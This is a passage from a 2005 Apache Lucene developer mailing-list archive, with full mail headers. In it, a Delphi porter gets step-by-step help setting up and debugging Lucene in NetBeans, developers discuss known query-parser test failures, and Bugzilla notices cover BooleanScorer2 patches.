either change and would be happy to see them if it means this gets committed so I can eliminate my local patch! Chuck -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Mar 23 02:18:48 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 98452 invoked from network); 23 Mar 2005 02:18:48 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Mar 2005 02:18:48 -0000 Received: (qmail 7009 invoked by uid 500); 23 Mar 2005 02:13:59 -0000 Delivered-To: [email protected] Received: (qmail 6851 invoked by uid 500); 23 Mar 2005 02:13:56 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 6750 invoked by uid 99); 23 Mar 2005 02:13:54 -0000 X-ASF-Spam-Status: No, hits=0.4 required=10.0 tests=DNS_FROM_RFC_ABUSE,RCVD_BY_IP,SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from rproxy.gmail.com (HELO rproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Tue, 22 Mar 2005 18:13:51 -0800 Received: by rproxy.gmail.com with SMTP id b11so57802rne for <[email protected]>; Tue, 22 Mar 2005 18:13:49 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:reply-to:to:subject:mime-version:content-type:content-transfer-encoding; b=OEzAZl1PS0qXxq7UyAMwZDdjSRqZ0YFkZ1JFSTjmjVuS1G4ssK94Zt2bkMcB0TIVcEOZ9HvkmMN5k/9e/o3UjmV+yIxwkFlPSzMqhoCJfsnWHM7rHcql7avwvrll8olpqsBzvr5rPNk74jbLUU3Sd5y9S8rxw08X7+kG6JhClyQ= Received: by 161.129.204.104 with SMTP id n6mr154223rnb; Tue, 22 Mar 2005 18:07:09 -0800 (PST) Received: by 161.129.204.104 with HTTP; Tue, 22 Mar 2005 18:07:09 -0800 (PST) Message-ID: <[email protected]> Date: Tue, 22 Mar 2005 21:07:09 -0500 From: "Mario Alejandro M." <[email protected]> Reply-To: "Mario Alejandro M." <[email protected]> To: [email protected] Subject: Ok, for a Java newbie, how setup NetBeans 4 + Lucene Mime-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N I download the most recent Lucene code. I download NetBeans 4.0 + JDK 5. I use the wizard to import the source and I get a Project with the rigth packages under it. Now, i want to use the Test Case code because I want to compare outpputs for my Delphi port. And in this point is where I get lost. In some point i was able to compile Lucene and produce a jar file (the equivalent EXE or DLL in windows?) but triying this and that I lost that. Now not compile.Complain about not found a package(org.apache.store and others) however I see it rigth in the treevier. When this compile or not I try with menu "Run Other" "Test Lucene" and not work, I try in a standalone project and not work. I not can figure what i need to do for be able to debug lucene with the provided test cases... and i have zero experience in Java in my life... I only want to debug Lucene.. I don't plan code in it rigth now... Thanks. --=20 Mario Alejandro Montoya MCP www.solucionesvulcano.com !Obtenga su sitio Web din=E1mico! MUTIS Lucene port to Delphi WANTED DEVELOPERS http://mutis.sourceforge.net/ --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Mar 23 02:51:51 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 19391 invoked from network); 23 Mar 2005 02:51:50 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Mar 2005 02:51:50 -0000 Received: (qmail 58400 invoked by uid 500); 23 Mar 2005 02:51:49 -0000 Delivered-To: [email protected] Received: (qmail 58369 invoked by uid 500); 23 Mar 2005 02:51:49 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 58355 invoked by uid 99); 23 Mar 2005 02:51:49 -0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_HELO_PASS X-Spam-Check-By: apache.org Received-SPF: neutral (hermes.apache.org: local policy) Received: from smtpauth06.mail.atl.earthlink.net (HELO smtpauth06.mail.atl.earthlink.net) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Tue, 22 Mar 2005 18:51:47 -0800 Received: from [161.129.204.104] (helo=ENGELSSERVER) by smtpauth06.mail.atl.earthlink.net with asmtp (Exim 4.34) id 1DDvyD-0007Gj-PO; Tue, 22 Mar 2005 21:51:45 -0500 Reply-To: <[email protected]> From: "Robert Engels" <[email protected]> To: <[email protected]>, "Mario Alejandro M." <[email protected]> Subject: RE: Ok, for a Java newbie, how setup NetBeans 4 + Lucene Date: Tue, 22 Mar 2005 20:51:45 -0600 Message-ID: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.6604 (9.0.2911.0) X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180 Importance: Normal In-Reply-To: <[email protected]> X-ELNK-Trace: 33cbdd8ed9881ca8776432462e451d7bd15d05d9470ff7101984cbb1b09677fcbb2d9aa2721cd641350badd9bab72f9c350badd9bab72f9c350badd9bab72f9c X-Originating-IP: 161.129.204.104 X-Virus-Checked: Checked X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Why not just use the C port of Lucene and forget the Delphi... The C port can be just as easily called from Delphi (and will probably be faster, and it seems to have more industry support). -----Original Message----- From: Mario Alejandro M. [mailto:[email protected]] Sent: Tuesday, March 22, 2005 8:07 PM To: [email protected] Subject: Ok, for a Java newbie, how setup NetBeans 4 + Lucene I download the most recent Lucene code. I download NetBeans 4.0 + JDK 5. I use the wizard to import the source and I get a Project with the rigth packages under it. Now, i want to use the Test Case code because I want to compare outpputs for my Delphi port. And in this point is where I get lost. In some point i was able to compile Lucene and produce a jar file (the equivalent EXE or DLL in windows?) but triying this and that I lost that. Now not compile.Complain about not found a package(org.apache.store and others) however I see it rigth in the treevier. When this compile or not I try with menu "Run Other" "Test Lucene" and not work, I try in a standalone project and not work. I not can figure what i need to do for be able to debug lucene with the provided test cases... and i have zero experience in Java in my life... I only want to debug Lucene.. I don't plan code in it rigth now... Thanks. -- Mario Alejandro Montoya MCP www.solucionesvulcano.com !Obtenga su sitio Web dinámico! MUTIS Lucene port to Delphi WANTED DEVELOPERS http://mutis.sourceforge.net/ --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Mar 23 03:02:52 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 22721 invoked from network); 23 Mar 2005 03:02:52 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Mar 2005 03:02:52 -0000 Received: (qmail 67669 invoked by uid 500); 23 Mar 2005 03:02:51 -0000 Delivered-To: [email protected] Received: (qmail 67648 invoked by uid 500); 23 Mar 2005 03:02:50 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 67635 invoked by uid 99); 23 Mar 2005 03:02:50 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (hermes.apache.org: local policy) Received: from relay01.pair.com (HELO relay01.pair.com) (161.129.204.104) by apache.org (qpsmtpd/0.28) with SMTP; Tue, 22 Mar 2005 19:02:49 -0800 Received: (qmail 34295 invoked from network); 23 Mar 2005 03:02:46 -0000 Received: from unknown (HELO ?161.129.204.104?) (unknown) by unknown with SMTP; 23 Mar 2005 03:02:46 -0000 X-pair-Authenticated: 161.129.204.104 Message-ID: <[email protected]> Date: Tue, 22 Mar 2005 22:02:46 -0500 From: Garrett Rooney <[email protected]> User-Agent: Mozilla Thunderbird 1.0 (X11/20050111) X-Accept-Language: en-us, en MIME-Version: 1.0 To: [email protected] Subject: Re: Ok, for a Java newbie, how setup NetBeans 4 + Lucene References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Robert Engels wrote: > Why not just use the C port of Lucene and forget the Delphi... I will admit, one of my motivations for porting Lucene to C is that it's considerably simpler to call into a C library from various other languages than it is to reimplement the whole library in your language of choice. Eventually I hope to see various wrappers on top of Lucene4c that allow it to be used from Ruby, Perl, Python, etc. Of course, there's also the 'compile it with gcj and then wrap that' approach that seems reasonably popular these days. I prefer the C approach because actually getting gcj to work has always been a problem when I've tried, but that does have the distinct advantage that you don't have to wait for the C implementation to be finished, the Java one works now. In any event, I'd welcome anyone looking at wrapping the C API to ask any questions that come up on the [email protected] list, I'd be more than happy to help with such efforts. -garrett --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Mar 23 03:41:16 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 35830 invoked from network); 23 Mar 2005 03:41:16 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Mar 2005 03:41:16 -0000 Received: (qmail 28441 invoked by uid 500); 23 Mar 2005 03:41:14 -0000 Delivered-To: [email protected] Received: (qmail 28412 invoked by uid 500); 23 Mar 2005 03:41:13 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 28399 invoked by uid 99); 23 Mar 2005 03:41:13 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: local policy) Received: from dev.allthingslocal.com (HELO dev.allthingslocal.com) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Tue, 22 Mar 2005 19:41:12 -0800 Received: from [161.129.204.104] ([acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b.129.204.104]) (AUTH: LOGIN chuck, TLS: TLSv1/SSLv3,256bits,AES256-SHA) by dev.allthingslocal.com with esmtp; Tue, 22 Mar 2005 21:41:10 -0600 id 000740AE.4240E556.0000110A Message-ID: <[email protected]> Date: Tue, 22 Mar 2005 19:40:55 -0800 From: Chuck Williams <[email protected]> Organization: All Things Local User-Agent: Mozilla Thunderbird 1.0 (Windows/20041206) X-Accept-Language: en-us, en MIME-Version: 1.0 To: [email protected] Subject: Re: Ok, for a Java newbie, how setup NetBeans 4 + Lucene References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Mario Alejandro M. writes (3/22/2005 6:07 PM): >I download the most recent Lucene code. I download NetBeans 4.0 + JDK >5. I use the wizard to import the source and I get a Project with the >rigth packages under it. Now, i want to use the Test Case code because >I want to compare outpputs for my Delphi port. And in this point is >where I get lost. In some point i was able to compile Lucene and >produce a jar file (the equivalent EXE or DLL in windows?) but triying >this and that I lost that. Now not compile.Complain about not found a >package(org.apache.store and others) however I see it rigth in the >treevier. When this compile or not I try with menu "Run Other" "Test >Lucene" and not work, I try in a standalone project and not work. I >not can figure what i need to do for be able to debug lucene with the >provided test cases... and i have zero experience in Java in my >life... > >I only want to debug Lucene.. I don't plan code in it rigth now... > > Hi Mario, I'm a Netbeans user; perhaps I can help you. I'm using Netbeans 4.1 now (the latest qbuild from 3/15 is the one to use if you decide to try 4.1), but the 4.0 you have is the current GA. Excuse me if some of this is slightly different than what you see due to the version difference. The following steps will set up Lucene so that you can build and run it in Netbeans: 1. Check Lucene out with subversion per the instructions on the site. Make your working directory something like /Lucene/Projects, getting a tree rooted under that in trunk. 2. In NB, do File - New Project - Java Project with Existing Ant Script 3. Set the Location to /Lucene/Projects/trunk. The build script, project name and project directory will probably all default correctly (they do for me). Just in case, the product directory is trunk, build script is trunk/build.xml, and name is whatever you want (e.g., I use LuceneLatest). 4. Since I already have this set up, I can't see the exact sequence of settings you will get from here, but I can tell you the settings you need. If you get anything wrong or some setting is missing during the import process, you can always go to the context menu of your project node after the import to review and adjust things (right click on the project node in the Projects tab). Your source package folder should be src/java, your test package folder should be src/test, you don't need to add anythiing to you classpath, your ant target mappings are (build-->jar, clean-->clean, javadoc-->javadocs, and test-->test); all of these should default properly except for build-->jar which you will need to set. 6. When you are done, you can use the project context menu, menu bar build/run menus, or toolbar to execute various actions (clean and build, build, and test are mainly what you want; test will build the tests, run them all and report the results). 7. You can go one step further and go to the Versioning Manager to set up a direct link from Netbeans to Subversion. You'll need to download the Subversion module if you decide to do this (just download in from the link show in the Versioning Manager then run Tools - Update Center and select to install a module you have manually downloaded). Then the NB file and project tabs will show you status of your files. From the file tab you can right click to select any subverison actions, like update. If you run into problems, let me know. As a side note, I just ran the tests and got two errors: Testcase: testSimple(org.apache.lucene.queryParser.precedence.TestPrecedenceQueryParser): FAILED Query /a OR !b/ yielded /a -b/, expecting /a (-b)/ junit.framework.AssertionFailedError: Query /a OR !b/ yielded /a -b/, expecting /a (-b)/ at org.apache.lucene.queryParser.precedence.TestPrecedenceQueryParser.assertQueryEquals(TestPrecedenceQueryParser.java:122) at org.apache.lucene.queryParser.precedence.TestPrecedenceQueryParser.testSimple(TestPrecedenceQueryParser.java:224) at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:39) at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25) Testcase: testPrecedence(org.apache.lucene.queryParser.precedence.TestPrecedenceQueryParser): FAILED expected:<field:A -(+field:B +field:C)> but was:<field:A (-field:B +field:C)> junit.framework.AssertionFailedError: expected:<field:A -(+field:B +field:C)> but was:<field:A (-field:B +field:C)> at org.apache.lucene.queryParser.precedence.TestPrecedenceQueryParser.testPrecedence(TestPrecedenceQueryParser.java:559) at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:39) at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25) Chuck --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Mar 23 09:57:48 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 14266 invoked from network); 23 Mar 2005 09:57:48 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Mar 2005 09:57:48 -0000 Received: (qmail 90158 invoked by uid 500); 23 Mar 2005 09:57:47 -0000 Delivered-To: [email protected] Received: (qmail 89712 invoked by uid 500); 23 Mar 2005 09:57:45 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 89698 invoked by uid 99); 23 Mar 2005 09:57:45 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: local policy) Received: from Unknown (HELO ehatchersolutions.com) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Wed, 23 Mar 2005 01:57:45 -0800 Received: by ehatchersolutions.com (Postfix, from userid 504) id B648713E2135; Wed, 23 Mar 2005 04:57:39 -0500 (EST) Received: from [161.129.204.104] (va-chrvlle-cad1-bdgrp1-4b-b-169.chvlva.adelphia.net [161.129.204.104]) by ehatchersolutions.com (Postfix) with ESMTP id 9876413E2135 for <[email protected]>; Wed, 23 Mar 2005 04:57:25 -0500 (EST) Mime-Version: 1.0 (Apple Message framework v619.2) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed Message-Id: <[email protected]> Content-Transfer-Encoding: 7bit From: Erik Hatcher <[email protected]> Subject: Re: Ok, for a Java newbie, how setup NetBeans 4 + Lucene Date: Wed, 23 Mar 2005 04:57:19 -0500 To: [email protected] X-Mailer: Apple Mail (2.619.2) X-Spam-Checker-Version: SpamAssassin 3.0.1 (2004-10-22) on javelina X-Spam-Status: No, score=-1.3 required=5.0 tests=AWL,BAYES_00, RCVD_IN_NJABL_DUL,RCVD_IN_SORBS_DUL autolearn=no version=3.0.1 X-Spam-Level: X-Virus-Checked: Checked X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N On Mar 22, 2005, at 10:40 PM, Chuck Williams wrote: > As a side note, I just ran the tests and got two errors: These are known test failures. I've just made this test an exception and it will not run by default. To run this particular test: ant test -Dtestcase=TestPrecedenceQueryParser Erik > > Testcase: > testSimple(org.apache.lucene.queryParser.precedence.TestPrecedenceQuery > Parser): FAILED > Query /a OR !b/ yielded /a -b/, expecting /a (-b)/ > junit.framework.AssertionFailedError: Query /a OR !b/ yielded /a -b/, > expecting /a (-b)/ > at > org.apache.lucene.queryParser.precedence.TestPrecedenceQueryParser.asse > rtQueryEquals(TestPrecedenceQueryParser.java:122) > at > org.apache.lucene.queryParser.precedence.TestPrecedenceQueryParser.test > Simple(TestPrecedenceQueryParser.java:224) > at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) > at > sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.ja > va:39) > at > sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccesso > rImpl.java:25) > > > Testcase: > testPrecedence(org.apache.lucene.queryParser.precedence.TestPrecedenceQ > ueryParser): FAILED > expected:<field:A -(+field:B +field:C)> but was:<field:A (-field:B > +field:C)> > junit.framework.AssertionFailedError: expected:<field:A -(+field:B > +field:C)> but was:<field:A (-field:B +field:C)> > at > org.apache.lucene.queryParser.precedence.TestPrecedenceQueryParser.test > Precedence(TestPrecedenceQueryParser.java:559) > at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) > at > sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.ja > va:39) > at > sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccesso > rImpl.java:25) > > > > Chuck > > > --------------------------------------------------------------------- > To unsubscribe, e-mail: [email protected] > For additional commands, e-mail: [email protected] --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Mar 23 20:41:54 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 44095 invoked from network); 23 Mar 2005 20:41:12 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Mar 2005 20:41:12 -0000 Received: (qmail 7919 invoked by uid 500); 23 Mar 2005 20:36:59 -0000 Delivered-To: [email protected] Received: (qmail 7885 invoked by uid 500); 23 Mar 2005 20:36:58 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 7867 invoked by uid 99); 23 Mar 2005 20:36:58 -0000 X-ASF-Spam-Status: No, hits=0.4 required=10.0 tests=DNS_FROM_RFC_ABUSE,RCVD_BY_IP,SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from rproxy.gmail.com (HELO rproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Wed, 23 Mar 2005 12:36:57 -0800 Received: by rproxy.gmail.com with SMTP id a41so281770rng for <[email protected]>; Wed, 23 Mar 2005 12:36:55 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:reply-to:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:references; b=G8ADYk/jui805thPPUSADfEE0tyjhtGSCmzk1dWVBKH4Lnv3hHVrPh/0fHw7w7ORE8V6lPfxaNJzT9WsY3Dw/7A9+QxC39LgB1eIHAlO3ZLrTjworUd+DeOpkB1IvxL7dNRp3qxZSb3UcI9FpvCcEjLspQCzJnao7nqnLhy4fac= Received: by 161.129.204.104 with SMTP id i51mr901158rne; Wed, 23 Mar 2005 12:30:15 -0800 (PST) Received: by 161.129.204.104 with HTTP; Wed, 23 Mar 2005 12:30:14 -0800 (PST) Message-ID: <[email protected]> Date: Wed, 23 Mar 2005 15:30:14 -0500 From: "Mario Alejandro M." <[email protected]> Reply-To: "Mario Alejandro M." <[email protected]> To: [email protected] Subject: Re: Ok, for a Java newbie, how setup NetBeans 4 + Lucene In-Reply-To: <[email protected]> Mime-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable References: <[email protected]> <[email protected]> X-Virus-Checked: Checked X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Ok, I was able to setup it and see that compile fine and run the testcases. However, I don't can debug it (i put a breakpoint but nothing happend)... --=20 Mario Alejandro Montoya MCP www.solucionesvulcano.com !Obtenga su sitio Web din=E1mico! --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Mar 23 21:00:18 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 54186 invoked from network); 23 Mar 2005 21:00:18 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Mar 2005 21:00:18 -0000 Received: (qmail 47479 invoked by uid 500); 23 Mar 2005 21:00:13 -0000 Delivered-To: [email protected] Received: (qmail 47382 invoked by uid 500); 23 Mar 2005 21:00:13 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 47262 invoked by uid 500); 23 Mar 2005 21:00:12 -0000 Delivered-To: [email protected] Received: (qmail 47156 invoked by uid 99); 23 Mar 2005 21:00:12 -0000 X-ASF-Spam-Status: No, hits=0.2 required=10.0 tests=NO_REAL_NAME X-Spam-Check-By: apache.org Received: from ajax-1.apache.org (HELO ajax.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Wed, 23 Mar 2005 13:00:10 -0800 Received: from ajax.apache.org (ajax.apache.org [161.129.204.104]) by ajax.apache.org (Postfix) with ESMTP id 87A492B8 for <[email protected]>; Wed, 23 Mar 2005 21:29:52 +0100 (CET) Received: (from nobody@localhost) by ajax.apache.org (8.12.11/8.12.11/Submit) id j2NKTppF021918; Wed, 23 Mar 2005 21:29:51 +0100 Date: Wed, 23 Mar 2005 21:29:51 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 34154] - Further improvements to BooleanScorer2 X-Bugzilla-Reason: AssignedTo X-Virus-Checked: Checked X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=34154>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=34154 ------- Additional Comments From [email protected] 2005-03-23 21:29 ------- Created an attachment (id=14549) --> (http://issues.apache.org/bugzilla/attachment.cgi?id=14549&action=view) BooleanQuery.java This supersedes the patch to BooleanQuery in bug 33019. Adds some deprecated methods to use the 1.4.3 scorer and to allow skipTo() on that. Javadocs are included for these. It also uses the new disableCoord to disable the coordination in BooleanScorer2. For this, it assumes that BooleanScorer2Coord is split off from BooleanScorer2. See further attachments. -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Mar 23 23:26:22 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 91338 invoked from network); 23 Mar 2005 23:26:21 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Mar 2005 23:26:21 -0000 Received: (qmail 68024 invoked by uid 500); 23 Mar 2005 23:26:20 -0000 Delivered-To: [email protected] Received: (qmail 67993 invoked by uid 500); 23 Mar 2005 23:26:19 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 67980 invoked by uid 99); 23 Mar 2005 23:26:19 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: local policy) Received: from dev.allthingslocal.com (HELO dev.allthingslocal.com) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Wed, 23 Mar 2005 15:26:18 -0800 Received: from [161.129.204.104] ([acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b.129.204.104]) (AUTH: LOGIN chuck, TLS: TLSv1/SSLv3,256bits,AES256-SHA) by dev.allthingslocal.com with esmtp; Wed, 23 Mar 2005 17:26:16 -0600 id 00074168.4241FB18.000069C1 Message-ID: <[email protected]> Date: Wed, 23 Mar 2005 15:26:01 -0800 From: Chuck Williams <[email protected]> Organization: All Things Local User-Agent: Mozilla Thunderbird 1.0 (Windows/20041206) X-Accept-Language: en-us, en MIME-Version: 1.0 To: [email protected] Subject: Re: Ok, for a Java newbie, how setup NetBeans 4 + Lucene References: <[email protected]> <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Mario Alejandro M. writes (3/23/2005 12:30 PM): >Ok, I was able to setup it and see that compile fine and run the >testcases. However, I don't can debug it (i put a breakpoint but >nothing happend)... > > > You need a debug target. The easiest way by far is to create a second standard project with File - New Project - Java Application. Then add Lucene as a dependent project to this new project (new project context menu - Properties - I think in 4.0 it's the Compiling section, you'll find it). Then create a Main Class for the new project (wizard probably did this for you). Call whatever in Lucene you want from there. Then just Debug the new project and all will work (either set new the project as the main project and use main menu bar Run - Debug Main Project, or just use context menu of new project and run Debug directly). Alternatively, you could create a debug target for Lucene itself, which NB will mostly generate for you. If you want to go down this path (not recommended), then you need to read this: http://www.netbeans.org/kb/articles/freeform-config-40.html Chuck --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Mar 24 15:37:47 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 85958 invoked from network); 24 Mar 2005 15:37:46 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 24 Mar 2005 15:37:46 -0000 Received: (qmail 47333 invoked by uid 500); 24 Mar 2005 15:37:44 -0000 Delivered-To: [email protected] Received: (qmail 47167 invoked by uid 500); 24 Mar 2005 15:37:43 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 47064 invoked by uid 500); 24 Mar 2005 15:37:42 -0000 Delivered-To: [email protected] Received: (qmail 47042 invoked by uid 99); 24 Mar 2005 15:37:42 -0000 X-ASF-Spam-Status: No, hits=0.4 required=10.0 tests=NO_REAL_NAME,UPPERCASE_25_50 X-Spam-Check-By: apache.org Received: from ajax-1.apache.org (HELO ajax.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Thu, 24 Mar 2005 07:37:40 -0800 Received: from ajax.apache.org (ajax.apache.org [161.129.204.104]) by ajax.apache.org (Postfix) with ESMTP id 3191A28A for <[email protected]>; Thu, 24 Mar 2005 16:37:38 